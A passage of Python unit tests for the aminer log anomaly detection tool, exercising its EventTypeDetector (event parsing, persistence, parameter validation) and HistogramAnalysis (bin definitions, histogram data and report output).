self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]]]) self.assertEqual(etd.check_variables, [[True, True, True]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=", "")]) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [1]) self.assertTrue(etd.receive_atom(log_atom2)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]], [[25538.0], ["ddd "], ["ddd 25538"]]]) self.assertEqual(etd.check_variables, [[True, True, True], [True, True, True]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=", ""), ("ddd ", "")]) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [1, 1]) self.assertTrue(etd.receive_atom(log_atom3)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}, {"/seq/s11"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"]), ["/seq/s11"]] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if len(y) > 0 and isinstance(y[0], (int, float))]) + sorted([y for y in x if len(y) > 0 and isinstance(y[0], str)]) + [y for y in x if len(y) == 0] for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]], [["ddd ", "ddd "], [], []]]) self.assertEqual(etd.check_variables, [[True, True, True], [y != [] for y in etd.values[1]]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=", ""), ("ddd ", "")]) 
self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [1, 2]) # id_path_list + save_values=True + allowed_id_tuples etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/seq/s11"], allowed_id_tuples=[(" pid=",)]) self.assertTrue(etd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]]]) self.assertEqual(etd.check_variables, [[True, True, True]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",)]) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [1]) self.assertFalse(etd.receive_atom(log_atom2)) self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]]]) self.assertEqual(etd.check_variables, [[True, True, True]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",)]) self.assertEqual(etd.current_index, -1) self.assertEqual(etd.num_event_lines, [1]) self.assertFalse(etd.receive_atom(log_atom3)) self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}, {"/seq/s11"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"]), 
["/seq/s11"]] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]]]) self.assertEqual(etd.check_variables, [[True, True, True]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",)]) self.assertEqual(etd.current_index, -1) self.assertEqual(etd.num_event_lines, [1]) # test min_num_vals and max_num_vals etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) val_list = [[[]]] for i in range(1, etd.max_num_vals + 1, 1): log_atom = LogAtom(str(i).encode(), ParserMatch(MatchElement("path", str(i).encode(), i, None)), t, self.__class__.__name__) val_list[0][0].append(float(i)) self.assertTrue(etd.receive_atom(log_atom)) self.assertEqual(etd.values, val_list) i += 1 log_atom = LogAtom(str(i).encode(), ParserMatch(MatchElement("path", str(i).encode(), i, None)), t, self.__class__.__name__) val_list[0][0].append(float(i)) self.assertTrue(etd.receive_atom(log_atom)) self.assertEqual(etd.values, [[val_list[0][0][-etd.min_num_vals:]]]) #, ["/seq/s1", "/seq/d1"] def test2do_timer(self): """Test if the do_timer method is implemented properly.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) t = time.time() etd.next_persist_time = t + 400 self.assertEqual(etd.do_timer(t + 200), 200) self.assertEqual(etd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(etd.do_timer(t + 999), 1) self.assertEqual(etd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3persistence(self): """Test the do_persist and load_persistence_data methods.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) t = round(time.time(), 3) log_atom1 = LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, etd) log_atom2 = LogAtom(self.match_element2.match_string, 
ParserMatch(self.match_element2), t, etd) log_atom3 = LogAtom(self.match_element3.match_string, ParserMatch(self.match_element3), t, etd) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/seq/s11"]) self.assertTrue(etd.receive_atom(log_atom1)) self.assertTrue(etd.receive_atom(log_atom2)) self.assertTrue(etd.receive_atom(log_atom3)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}, {"/seq/s11"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"]), ["/seq/s11"]] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if len(y) > 0 and isinstance(y[0], (int, float))]) + sorted([y for y in x if len(y) > 0 and isinstance(y[0], str)]) + [y for y in x if len(y) == 0] for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]], [["ddd ", "ddd "], [], []]]) self.assertEqual(etd.check_variables, [[True, True, True], [y != [] for y in etd.values[1]]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",), ("ddd ",)]) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [1, 2]) etd.do_persist() # with open(etd.persistence_file_name, "r") as f: # self.assertEqual(f.read(), '[[["string:/seq", "string:/seq/s11", "string:/seq/d1"], ["string:/seq", "string:/seq/s11", "string:/seq/d1"]], [["string:/seq", "string:/seq/s11", "string:/seq/d1"], ["string:/seq", "string:/seq/s11", "string:/seq/d1"]], [[["string: pid=25537"], ["string: pid="], [25537.0]], [[], ["string:ddd ", "string:ddd "], []]], [], [[true, true, true], [false, true, false]], [1, 2], [["string: pid="], ["string:ddd "]]]') etd.num_events = 0 etd.found_keys = [] etd.variable_key_list = [] etd.values = [] etd.num_event_lines = [] etd.current_index = 0 etd.id_path_list_tuples = [] etd.load_persistence_data() self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}, 
{"/seq/s11"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"]), ["/seq/s11"]] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if len(y) > 0 and isinstance(y[0], (int, float))]) + sorted([y for y in x if len(y) > 0 and isinstance(y[0], str)]) + [y for y in x if len(y) == 0] for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]], [["ddd ", "ddd "], [], []]]) self.assertEqual(etd.check_variables, [[True, True, True], [y != [] for y in etd.values[1]]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",), ("ddd ",)]) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [1, 2]) other = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) self.assertEqual(etd.num_events, other.num_events) self.assertEqual(etd.found_keys, other.found_keys) self.assertEqual(etd.variable_key_list, other.variable_key_list) self.assertEqual(etd.values, other.values) self.assertEqual(etd.check_variables, other.check_variables) self.assertEqual(etd.longest_path, other.longest_path) self.assertEqual(etd.id_path_list_tuples, other.id_path_list_tuples) self.assertEqual(etd.current_index, other.current_index) self.assertEqual(etd.num_event_lines, other.num_event_lines) def test4validate_parameters(self): """Test all initialization parameters for the detector. 
Input parameters must be validated in the class.""" self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, ["default"]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, None) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, "") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, b"Default") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, True) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, 123) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, 123.3) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, {"id": "Default"}) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, ()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, set()) self.assertRaises(ValueError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id="") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=None) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=b"Default") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=True) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123.22) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id={"id": "Default"}) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=["Default"]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=[]) 
self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=set()) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], persistence_id="Default") self.assertRaises(ValueError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=[""]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=[b"True"]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list="True") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=True) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=123) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=123.22) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list={"id": "Default"}) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=set()) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["default"]) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=None) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=[]) self.assertRaises(ValueError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=[""]) self.assertRaises(TypeError, EventTypeDetector, 
self.aminer_config, [self.stream_printer_event_handler], id_path_list=[b"True"]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list="True") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=True) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=123) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=123.22) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list={"id": "Default"}) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], id_path_list=set()) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["default"]) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=None) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=[]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allow_missing_id=b"True") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allow_missing_id="True") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allow_missing_id=123) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allow_missing_id=123.22) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allow_missing_id={"id": "Default"}) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, 
[self.stream_printer_event_handler], allow_missing_id=["Default"]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allow_missing_id=[]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allow_missing_id=()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allow_missing_id=set()) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], allow_missing_id=True) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples=b"True") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples="True") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples=123) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples=123.22) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples={"id": "Default"}) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples=["Default"]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples=[()]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples=()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples=set()) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples=[]) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], allowed_id_tuples=None) EventTypeDetector(self.aminer_config, 
[self.stream_printer_event_handler], allowed_id_tuples=[(b"value",)]) self.assertRaises(ValueError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals=-1) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals=b"Default") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals="123") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals={"id": "Default"}) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals=["Default"]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals=[]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals=()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals=set()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals=100.22) self.assertRaises(ValueError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], max_num_vals=-1) self.assertRaises(ValueError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], max_num_vals=0) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], max_num_vals=b"Default") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], max_num_vals="123") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], max_num_vals={"id": "Default"}) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], max_num_vals=["Default"]) 
self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], max_num_vals=[]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], max_num_vals=()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], max_num_vals=set()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], max_num_vals=100.22) self.assertRaises(ValueError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals=100, max_num_vals=100) self.assertRaises(ValueError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], min_num_vals=101, max_num_vals=100) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], min_num_vals=10, max_num_vals=100) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], save_values=b"True") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], save_values="True") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], save_values=123) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], save_values=123.22) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], save_values={"id": "Default"}) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], save_values=["Default"]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], save_values=[]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], save_values=()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], 
save_values=set()) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], save_values=True) self.assertRaises(ValueError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, EventTypeDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=set()) EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/HistogramAnalysisTest.py000066400000000000000000001344371500476301700304720ustar00rootroot00000000000000import unittest from aminer.analysis.HistogramAnalysis import LinearNumericBinDefinition, ModuloTimeBinDefinition, HistogramData, HistogramAnalysis, \ PathDependentHistogramAnalysis from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch import time from datetime 
import datetime from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase class HistogramAnalysisTest(TestBase): """Unittests for the HistogramAnalysis.""" def test1LinearNumericBinDefinition(self): """This test case aims to validate the functionality of the LinearNumericBinDefinition.""" # test get_bin_names method self.assertEqual(LinearNumericBinDefinition(0, 1, 10, True).get_bin_names(), [ "...-0]", "[0-1]", "[1-2]", "[2-3]", "[3-4]", "[4-5]", "[5-6]", "[6-7]", "[7-8]", "[8-9]", "[9-10]", "[10-..."]) self.assertEqual(LinearNumericBinDefinition(0, 2, 10, True).get_bin_names(), [ "...-0]", "[0-2]", "[2-4]", "[4-6]", "[6-8]", "[8-10]", "[10-12]", "[12-14]", "[14-16]", "[16-18]", "[18-20]", "[20-..."]) # test get_bin method self.assertEqual(LinearNumericBinDefinition(0, 1, 10, True).get_bin(2), 3) self.assertEqual(LinearNumericBinDefinition(1, 1, 10, True).get_bin(2), 2) self.assertEqual(LinearNumericBinDefinition(2, 1, 10, True).get_bin(2), 1) self.assertEqual(LinearNumericBinDefinition(0, 4, 10, True).get_bin(2), 1) # test get_bin_p_values method lnbd = LinearNumericBinDefinition(0, 1, 10, True) self.assertNotEqual(lnbd.get_bin_p_value(2, 10, 2), None, "Probably the scipy module could not be loaded. 
Please check your installation.") def test2ModuloTimeBinDefinition(self): """This test case aims to validate the functionality of the ModuloTimeBinDefinition.""" mtbd = ModuloTimeBinDefinition(86400, 3600, 0, 1, 10, False) self.assertEqual(mtbd.get_bin_names(), ["[0-1]", "[1-2]", "[2-3]", "[3-4]", "[4-5]", "[5-6]", "[6-7]", "[7-8]", "[8-9]", "[9-10]"]) mtbd = ModuloTimeBinDefinition(86400, 3600, 0, 2, 10, False) self.assertEqual(mtbd.get_bin_names(), ["[0-2]", "[2-4]", "[4-6]", "[6-8]", "[8-10]", "[10-12]", "[12-14]", "[14-16]", "[16-18]", "[18-20]"]) # test get_bin method modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False) self.assertEqual(modulo_time_bin_definition.get_bin(57599), 15) self.assertEqual(modulo_time_bin_definition.get_bin(57600), 16) self.assertEqual(modulo_time_bin_definition.get_bin(61199), 16) self.assertEqual(modulo_time_bin_definition.get_bin(61200), 17) # test get_bin_p_values method mtbd = ModuloTimeBinDefinition(86400, 3600, 0, 1, 10, False) self.assertNotEqual(mtbd.get_bin_p_value(2, 10, 2), None, "Probably the scipy module could not be loaded. 
Please check your installation.") def test3HistogramData(self): """This test case aims to validate the functionality of the HistogramData.""" # test add_value method modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False) histogram_data = HistogramData("crontab", modulo_time_bin_definition) histogram_data.add_value(57600) self.assertEqual(histogram_data.bin_data[16], 1) self.assertEqual(histogram_data.total_elements, 1) self.assertEqual(histogram_data.binned_elements, 0) histogram_data.add_value(61200) self.assertEqual(histogram_data.bin_data[16], 1) self.assertEqual(histogram_data.bin_data[17], 1) self.assertEqual(histogram_data.total_elements, 2) self.assertEqual(histogram_data.binned_elements, 0) histogram_data.add_value(61500) self.assertEqual(histogram_data.bin_data[16], 1) self.assertEqual(histogram_data.bin_data[17], 2) self.assertEqual(histogram_data.total_elements, 3) self.assertEqual(histogram_data.binned_elements, 0) histogram_data.add_value(100000) # 100000%86400 = 13600 -> 3 self.assertEqual(histogram_data.bin_data[3], 1) self.assertEqual(histogram_data.bin_data[16], 1) self.assertEqual(histogram_data.bin_data[17], 2) self.assertEqual(histogram_data.total_elements, 4) self.assertEqual(histogram_data.binned_elements, 0) # test clone method clone = histogram_data.clone() self.assertEqual(clone.bin_data[3], 1) self.assertEqual(clone.bin_data[16], 1) self.assertEqual(clone.bin_data[17], 2) self.assertEqual(clone.total_elements, 4) self.assertEqual(clone.binned_elements, 0) clone.add_value(1) self.assertEqual(clone.bin_data[0], 1) self.assertEqual(histogram_data.bin_data[0], 0) # test reset method histogram_data.reset() self.assertEqual(histogram_data.total_elements, 0) self.assertEqual(histogram_data.binned_elements, 0) for item in histogram_data.bin_data: self.assertEqual(item, 0) self.assertEqual(clone.bin_data[0], 1) self.assertEqual(clone.bin_data[3], 1) self.assertEqual(clone.bin_data[16], 1) 
self.assertEqual(clone.bin_data[17], 2) self.assertEqual(clone.total_elements, 5) self.assertEqual(clone.binned_elements, 0) # test to_string method self.assertEqual(clone.to_string(""), 'Property "crontab" (5 elements):\n* [0-1]: 1 (ratio = 2.00e-01, p = 1.92e-01)\n' '* [3-4]: 1 (ratio = 2.00e-01, p = 1.92e-01)\n* [16-17]: 1 (ratio = 2.00e-01, p = 1.92e-01)\n* [17-18]: 2 (ratio = 4.00e-01, p = 1.60e-02)') def test4receive_atom_HistogramAnalysis(self): """Test if reports on anomalies are generated correctly.""" expected_string = '%s Histogram report\n%s: "None" (%d lines)\n Histogram report from %s till %s\n %s\n\n' datetime_format_string = "%Y-%m-%d %H:%M:%S" t = time.time() # test the functionality of the HistogramAnalysis, when NO report is expected start_time = 57600 end_time = 662600 diff = 30000 mtbd = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False) histogram_data = HistogramData("match", mtbd) histogram_analysis = HistogramAnalysis(self.aminer_config, [(histogram_data.property_path, mtbd)], 604800, [self.stream_printer_event_handler]) match_element_start = MatchElement("match", str(start_time).encode(), start_time, None) log_atom_start = LogAtom(match_element_start.match_string, ParserMatch(match_element_start), t, histogram_analysis) match_element_end = MatchElement("match", str(end_time).encode(), end_time, None) log_atom_end = LogAtom(match_element_end.match_string, ParserMatch(match_element_end), t + diff, histogram_analysis) histogram_analysis.receive_atom(log_atom_start) histogram_analysis.receive_atom(log_atom_end) self.assertEqual(self.output_stream.getvalue(), "") log_atom_start.atom_time += diff log_atom_end.atom_time += diff histogram_analysis.receive_atom(log_atom_start) histogram_analysis.receive_atom(log_atom_end) self.assertEqual(self.output_stream.getvalue(), "") # test the functionality of the HistogramAnalysis, when a report is expected. 
start_time = 57600
        end_time = 662600
        diff = 605000  # exceeds the 604800 s window -> a report is expected
        # NOTE(review): the analyzer below is built from histogram_data.property_path and
        # mtbd only, so this reset() does not appear to influence the analyzer's own
        # state -- confirm against HistogramAnalysis.
        histogram_data.reset()
        histogram_analysis = HistogramAnalysis(self.aminer_config, [(histogram_data.property_path, mtbd)], 604800, [self.stream_printer_event_handler])
        match_element_start = MatchElement("match", str(start_time).encode(), start_time, None)
        log_atom_start = LogAtom(match_element_start.match_string, ParserMatch(match_element_start), t, histogram_analysis)
        match_element_end = MatchElement("match", str(end_time).encode(), end_time, None)
        log_atom_end = LogAtom(match_element_end.match_string, ParserMatch(match_element_end), t + diff, histogram_analysis)
        histogram_analysis.receive_atom(log_atom_start)
        histogram_analysis.receive_atom(log_atom_end)
        dtm = datetime.fromtimestamp(t).strftime(datetime_format_string)
        dtm2 = datetime.fromtimestamp(t + diff).strftime(datetime_format_string)
        # Both parsed values fall into bin 16, hence a single 2-element bin.
        self.assertEqual(self.output_stream.getvalue(), expected_string % (dtm2, histogram_analysis.__class__.__name__, 2, dtm, dtm2, 'Property "match" (2 elements):\n * [16-17]: 2 (ratio = 1.00e+00, p = 1.74e-03)'))
        self.reset_output_stream()
        t1 = t + diff
        start_time += 3600
        end_time += 3600
        # Only the end element is rebuilt with the new end_time (666200 -> bin 17);
        # log_atom_start reuses match_element_start (57600 -> bin 16), so the report
        # now shows one element per bin.
        log_atom_start = LogAtom(match_element_start.match_string, ParserMatch(match_element_start), t1, histogram_analysis)
        match_element_end = MatchElement("match", str(end_time).encode(), end_time, None)
        log_atom_end = LogAtom(match_element_end.match_string, ParserMatch(match_element_end), t1 + diff, histogram_analysis)
        histogram_analysis.receive_atom(log_atom_start)
        histogram_analysis.receive_atom(log_atom_end)
        dtm = datetime.fromtimestamp(t1).strftime(datetime_format_string)
        dtm2 = datetime.fromtimestamp(t1 + diff).strftime(datetime_format_string)
        self.assertEqual(self.output_stream.getvalue(), expected_string % (dtm2, histogram_analysis.__class__.__name__, 2, dtm, dtm2, 'Property "match" (2 elements):\n * [16-17]: 1 (ratio = 5.00e-01, p = 8.16e-02)\n * [17-18]: 1 (ratio = 5.00e-01, p = 8.16e-02)'))
        # reset_after_report_flag = False
        # With reset_after_report_flag=False the histogram is not cleared after a
        # report, so the counts of consecutive reports accumulate (2 + 2 = 4 below).
        start_time = 57600
        end_time = 662600
        diff = 605000
        histogram_data.reset()
        histogram_analysis = HistogramAnalysis(self.aminer_config, [(histogram_data.property_path, mtbd)], 604800, [self.stream_printer_event_handler], reset_after_report_flag=False)
        match_element_start = MatchElement("match", str(start_time).encode(), start_time, None)
